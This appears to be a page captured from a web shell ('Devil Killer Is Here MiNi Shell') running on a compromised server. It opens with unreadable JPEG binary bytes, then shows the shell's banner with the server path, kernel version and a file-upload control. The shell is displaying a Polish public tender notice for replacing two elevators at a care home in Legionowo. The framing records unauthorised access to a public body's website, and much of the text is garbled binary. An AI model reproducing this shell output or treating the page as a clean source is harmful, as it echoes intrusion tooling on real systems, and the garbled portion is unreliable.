JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/0021253001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na wymianie dwóch dźwigów osobowych w budynku Domu Pomocy Społecznej „Kombatant” w Legionowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Legionowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269858</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gen. Władysława Sikorskiego 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legionowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-119</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48227640598</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48227640450</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiat-legionowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.powiat-legionowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na wymianie dwóch dźwigów osobowych w budynku Domu Pomocy Społecznej „Kombatant” w Legionowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c4afdf2-c236-4ac9-bd99-8e793f2ca873</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00212530</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025667/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.19 Wymiana dźwigów osobowych w Domu Pomocy Społecznej &#34;Kombatant&#34; w Legionowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat-legionowski/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat-legionowski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>j.polskim w formie elektronicznej za pośredn. platformy zakupowej, zwanej dalej platformazakupowa.pl pod<br/>adresem:https://platformazakupowa.pl/pn/powiatlegionowski/proceedings 2. Komunikacja, w tym wszelkie oświadczenia,<br/>wnioski,zawiadomienia oraz informacje, przekazywane są w formie elektr. za pośrednictwem platformazakupowa.pl i formularza<br/>„Wyślij wiadomość do Zamawiającego”. Za datę przekazania(wpływu) przyjmuje się datę ich przesłania za pośrednictwem<br/>platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”. 3. Zam. przekazuje Wykonawcom<br/>informacje w formie elektron. za pośrednictwem platformazakupowa.pl. Informacje dotyczące odp. na pyt., zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zam. zamieszcza na platformie w sekcji „Komunikaty”. Korespondencja, której adresatem<br/>jest konkretny Wyk., przekazywana jest w formie elektron. za pośrednictwem platformazakupowa.pl do konkretnego<br/>Wyk..4.Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez Zam., gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do<br/>folderu SPAM.5.Zgodnie z § 11 ust. 2 Rozp. Prez. Rady Min. z dnia 30.12.2020 r. w spr. sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zam. publ. lub konkursie (Dz. U. z 2020 r. poz. 2452), Zam. określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego<br/>nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana<br/>dowolna przeglądarka internetowa, inna niż Internet Explorer ,4)włączona obsługa JavaScript,5)zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf,6)szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu<br/>TLS 1.3,7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany<br/>według czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.6.Wykonawca, przystępując do niniejszego<br/>postępowania o udzielenie zamówienia publicznego:1) akceptuje warunki korzystania z platformazakupowa.pl określone w<br/>Regulaminie zamieszczonym na stronie<br/>https://platformazakupowa.pl/pn/powiatlegionowski w zakładce „Regulamin” oraz uznaje go za wiążący,2)zapoznał i stosuje się do<br/>Instrukcji składania ofert/wniosków dostępnej pod linkiem https://platformazakupowa.pl/strona/45-instrukcje. 7.Zamawiający nie<br/>ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności<br/>za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce<br/>„Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana<br/>pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.8. Oferty,<br/>oświadczenia art. 125 ust. 1Pzp, podmiotowe środki dowodowe, w tym oświadczenie art. 117 ust. 4 Pzp, oraz zobowiązanie<br/>podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, przedmiotowe środki dowodowe, pełnomocnictwo,<br/>dokumenty, o których mowa w art. 94 ust. 2 ustawy, sporządza się w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że: 1) administratorem danych osobowych jest Powiat Legionowski z<br/>siedzibą w Starostwie Powiatowym w Legionowie ul. Generała Władysława Sikorskiego 11, 05-119 Legionowo; 2) Powiat<br/>Legionowski wyznaczył inspektora ochrony danych, z którym można skontaktować się poprzez e-mail: dpo@powiat-legionowski.pl<br/>lub pisemnie na adres wskazany w pkt. 1; 3) dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu i<br/>zakresie niezbędnym związanym z postępowaniem o udzielenie zamówienia publicznego przez Administratora w związku z<br/>przepisami dotyczącymi realizacji postępowań o udzielenie zamówienia publicznego, a po rozstrzygnięciu postępowania na<br/>podstawie art. 6 ust. 1 lit. b RODO w celu zawarcia i realizacji umowy, której Wykonawca jest stroną; 4) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz<br/>art. 74 ust. 3 i 4 oraz art. 75 i 76 ustawy z dnia 11 .09.2019 r. – Prawo zamówień publicznych lub podmioty przetwarzające dane<br/>osobowe na polecenie Administratora na podstawie stosownych umów z nim zawartych; 5) Pani/Pana dane osobowe będą przechowywane przez obowiązkowy okres wskazany przepisami prawa, tj. przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a w przypadku gdy czas trwania umowy przekracza 4 lata, to okres przechowywania obejmuje cały czas<br/>trwania umowy, oraz do momentu przedawnienia roszczeń; 6) na zasadach i w granicach określonych przepisami prawa, posiada<br/>Pani/Pan prawo do żądania od administratora: a) dostępu do treści swoich danych osobowych, przy czym jeśli żądanie wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu, b) sprostowania swoich danych osobowych, c) ograniczenia przetwarzania swoich danych osobowych,<br/>przy czym wystąpienie z żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu; 7) w przypadku uznania, iż przetwarzanie Pani/Pana danych osobowych narusza<br/>przepisy RODO, posiada Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych; 8) podanie przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>z dnia 11.09.2019 r. – Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Niepodanie danych uniemożliwi Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności<br/>Wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub odrzuceniem<br/>jego oferty; 9) Pani/Pana dane osobowe nie będą przedmiotem zautomatyzowanego podejmowania decyzji, w tym profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPU.272.20.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na wymianie dwóch wind 3- przystankowych, dostosowanych do transportu osób niepełnosprawnych, z zachowaniem istniejących szybów windowych w budynku DomuPomocy Społecznej „Kombatant” położonym w Legionowie przy ul. Jagiellońskiej 71, w ramach zadania pn. „Wymiana dźwigów osobowych w Domu Pomocy Społecznej „Kombatant” w Legionowie.”<br/>2. Zakres prac w ramach przedmiotowego zadania został określony w dokumentacji projektowej wymiany dwóch wind<br/>osobowych w Budynku Domu Pomocy Społecznej „Kombatant” w Legionowie i obejmuje w szczególności:<br/>1)	demontaż istniejących dwóch dźwigów – producent dźwigów: Monitor S.p.A. Via Postumia 1, 20021 Baranzate di Bollate (Mi) Italia, numery fabryczne dźwigów: 208855 – dźwig 1000 kg oraz 208856 – dźwig 1600 kg (demontaż wszystkich podzespołów istniejących dźwigów, znajdujących się w maszynowni oraz w szybie, demontaż pozostałych instalacji w szybie i maszynowni, zamurowanie otworów po zdemontowanych elementach zarówno w szybie jak i w maszynowni, oczyszczenie ścian w maszynowni oraz malowanie farbą emulsyjną, oczyszczenie posadzek w maszynowni oraz malowanie farbą epoksydową, oczyszczenie ścian w szybie oraz pomalowanie ich farbą emulsyjną, oczyszczenie posadzki w szybie oraz pomalowanie jej farbą epoksydową, itp.),<br/>2)montaż nowego oświetlenia w szybach,<br/>3)wykonanie niezbędnych robót dostosowawczych w obrębie szybów, w tym wykonanie wentylacji szybu zgodnie z obowiązującymi przepisami,<br/>4)wykonanie niezbędnych instalacji zasilających i oświetleniowych, doprowadzenie instalacji obwodów zasilających do miejsc montażu szafy sterowej dźwigów,<br/>5)doprowadzenie instalacji obwodów zasilania administracyjnego do miejsc montażu szafy sterowej dźwigów,<br/>6)dobór wind spełniających wymagania Zamawiającego określone w dokumentacji projektowej, dostawa i montaż wszystkich podzespołów dźwigów w istniejących szybach, przy czym dla poszczególnych urządzeń, należy uwzględnić w szczególności:<br/>a) dźwig nr 1:<br/>- dźwig z napędem elektrycznym typu MRL,<br/>- osobowy, zapewniający dostępność dla osób, w tym dla osób niepełnosprawnych oraz z ograniczeniem ruchowym,<br/>- kabina i drzwi wykonane ze stali nierdzewnej austenitycznej,<br/>- udźwig 1000 kg lub 13 osób,<br/>- prędkość: nie mniejsza niż 0,8 m/s (oczekiwana 1,0 m/s),<br/>- liczba startów na godzinę: min. 100/h,<br/>- ilość obsługiwanych przystanków/ilość dojść: 3 (kabina nieprzelotowa).<br/>b)dźwig nr 2:<br/>- dźwig z napędem elektrycznym typu MRL,<br/>- osobowy, zapewniający dostępność dla osób, w tym dla osób niepełnosprawnych oraz z ograniczeniem ruchowym,<br/>- kabina i drzwi wykonane ze stali nierdzewnej austenicznej,<br/>- udźwig 1600 kg lub 21 osób,<br/>- liczba startów na godzinę: min. 100/h,<br/>- prędkość: nie mniejsza niż 0,8 m/s (oczekiwana 1,0 m/s),<br/>- ilość obsługiwanych przystanków/ilość dojść: 3 (kabina nieprzelotowa).<br/><br/>Szczegółowa, projektowana charakterystyka techniczna nowych dźwigów została zawarta w opracowaniu pn. Dokumentacja projektowa wymiany dwóch wind osobowych w budynku Domu Pomocy Społecznej „Kombatant” w Legionowie, <br/><br/>7)montaż drzwi szybowych na wszystkich przystankach,<br/>8)wykonanie obróbek drzwi szybowych na wszystkich kondygnacjach,<br/>9)podłączenie dźwigów do centrali ppoż i sprawdzenie poprawności działania dźwigów w przypadku uruchomienia sygnału alarmu,<br/>10)w przypadku zastosowania linii alarmowej ze służbami ratowniczymi w technologii GSM, zapewnienie przez wykonawcę karty do łączności w okresie gwarancji,<br/>11)przygotowanie i przekazanie dokumentacji technicznej powykonawczej, w tym pełnej instrukcji obsługi dla dźwigu oraz sterowania w jęz. polskim i karty gwarancyjnej,<br/>12)przeprowadzenie oceny zgodności dźwigów, certyfikacji zgodnie z obowiązującymi normami, pomiarów elektrycznych, prób obciążeniowych i innych wymaganych,<br/>13)przeprowadzenie procedury rejestracji dźwigów w UDT, uzyskanie wszelkich pozwoleń na użytkowanie, poniesienie kosztów z tym związanych,<br/>14)oczyszczenie placu budowy,<br/>15)szkolenie pracowników użytkownika z obsługi i eksploatacji dźwigów,<br/>16)przeprowadzanie bezpłatnych przeglądów gwarancyjnych przez Wykonawcę, w okresie obowiązującej gwarancji oraz naprawy i serwis dźwigów w przypadku awarii dźwigów.<br/>3.Wszystkie użyte do realizacji przedmiotu zamówienia materiały, urządzenia oraz elementy wyposażenia muszą być fabrycznie nowe oraz wyprodukowane w UE. Zamawiający nie dopuszcza wykorzystania materiałów, urządzeń oraz elementów wyposażenia używanych, w tym pochodzących z odzysku, ekspozycji, wystawy, itp.<br/>4.Nowe windy muszą odpowiadać przepisom określonym w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz.U. z 2022 r. poz. 1225). Ponadto wszystkie ww. materiały powinny odpowiadać wszelkim wymaganym w tym zakresie normom oraz posiadać certyfikaty i świadectwa dopuszczenia do stosowania w budownictwie oraz bezpieczeństwa, zgodnie z opisem zawartym w dokumentacji projektowej. <br/>5.W zakresie dostępności dźwigów dla osób, w tym dla osób niepełnosprawnych, urządzenia muszą spełniać wymogi normy PN-EN 81-70:2005 i być wyposażone zgodnie z poniższym wykazem:<br/>- lustro w kabinie, zgodnie z PN-EN 81.70<br/>- poręcze w kabinie, zgodnie z PN-EN 81.70<br/>- panele sterownicze, zgodnie z PN-EN 81.70<br/>- pętla indukcyjna dla osób słabosłyszących, zgodnie z PN-EN 81.70<br/>- system informacji głosowej, zgodnie z PN-EN 81.70<br/>- sygnalizacja, zgodnie z PN-EN 81.70<br/>- przyciski, zgodnie z PN-EN 81.70<br/>- wyświetlacze, zgodnie z PN-EN 81.70<br/>- przystankowe urządzenia sterownicze, zgodnie z PN-EN 81.70<br/>- funkcje zatrzymania kabiny na przystanku, zgodnie z PN-EN 81.70.<br/>6.Zamawiający nie stawia wymagań w zakresie wyposażenia kabin w system dezynfekcji oraz kamerę przemysłową monitorującą wnętrze.<br/>7.Zamawiający zastrzega, że części zamienne oraz serwis dostarczonych urządzeń (podzespołów) muszą być dostępne na terenie Polski w ciągu 7 dni.<br/>8.Zamawiający zastrzega konieczność zapewnienia sterowania „otwartego” (ogólnodostępnego) dla wszystkich osób i firm z odpowiednimi uprawnieniami dozorowymi, pozbawione zabezpieczeń w postaci kodów/blokad/kluczy elektronicznych itp. Zamawiający wymaga – w przypadku sytuacji alarmu, wpięcia dźwigów do systemu SSP, dwustronnej łączności głosowej ze służbami ratowniczymi, zapewnienia zjazdu na przystanek ewakuacyjny, otwarcia drzwi oraz unieruchomienia dźwigu. W przypadku wystąpienia pożaru, przy sprowadzaniu dźwigów na przystanek ewakuacyjny, zjazd taki będzie realizowany z bieżącego zasilania budynku. <br/>9.Zamawiający wymaga przeprowadzania bezpłatnych przeglądów gwarancyjnych przez Wykonawcę, w okresie obowiązującej gwarancji. Harmonogram przeglądów gwarancyjnych należy dołączyć do dokumentacji powykonawczej. Przeglądy gwarancyjne należy wykonywać w dni powszednie w godzinach 8-15 po wcześniejszym pisemnym powiadomieniu Zamawiającego o terminie przeglądu. Naprawy wynikające z gwarancji na urządzenia należy realizować w terminie do 24 godzin od momentu pisemnego zgłoszenia usterki przez przedstawiciela Zamawiającego na wskazany adres mailowy Wykonawcy.<br/>10.W przypadku zastosowania przez Wykonawcę linii alarmowej ze służbami ratowniczymi w technologii GSM, Wykonawca zapewni kartę do łączności w okresie gwarancji. Zamawiający wymaga pełnienia wsparcia technicznego dla serwisu konserwującego windy w okresie gwarancji w przypadku awarii dźwigów.<br/>11.Konserwacja i bieżący serwis wind będzie się odbywać przez dowolny podmiot gospodarczy, posiadający wymagane uprawnienia UDT. Wykonawca ma obowiązek udzielenia autoryzacji dla niezależnego podmiotu konserwującego oraz dostarczenia wszelkich niezbędnych urządzeń i przyrządów do wykonywania bieżącego serwisu, konserwacji i usuwania awarii. <br/>12.Zamawiający wymaga, aby dźwigi były oparte na ogólnodostępnych podzespołach (dostępnych również poza siecią handlową producenta, pozbawione patentów i rozwiązań dedykowanych), umożliwiające swobodną konserwację przez inne firmy dźwigowe.<br/>13.Zamawiający wymaga, aby sterowanie było oparte na ogólnodostępnych podzespołach bez konieczności stosowania dedykowanych testerów oraz prawa wyłączności do oprogramowania i zmiany konfiguracji dźwigu tylko przez zależne od producenta firmy konserwacyjne. <br/>14.Zamawiający zastrzega, że części zamienne do wind mają być ogólnodostępne w sprzedaży na terytorium Polski w dowolnych hurtowniach zaopatrujących firmy dźwigowe.<br/>15.Zamawiający nie dopuszcza kodowania elektronicznego lub zabezpieczania mechanicznego dźwigów, uniemożliwiającego serwis i wykonywanie zmian konfiguracyjnych przez niezależne od producenta firmy konserwacyjne.<br/>16.Charakterystyka istniejących szybów windowych oraz istniejących dźwigów została zawarta w opracowaniu pn. Dokumentacja projektowa wymiany dwóch wind osobowych w budynku Domu Pomocy Społecznej „Kombatant” w Legionowie.<br/>17.Roboty budowlane są objęte następującą dokumentacją projektową stanowiącą załącznik do SWZ:<br/>1)Dokumentacja projektowa wymiany dwóch wind osobowych w budynku Domu Pomocy Społecznej „Kombatant” w Legionowie;<br/>2)Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych;<br/>3)Przedmiary robót, stanowiące materiał pomocniczy przy sporządzaniu oferty:<br/>a)Przedmiar - wymiana windy osobowej w Domu Pomocy Społecznej KOMBATANT;<br/>b)Przedmiar – wymiana windy szpitalnej w Domu Pomocy Społecznej KOMBATANT.<br/><br/>Dalsza część opisu przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42416100-6 - Windy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: 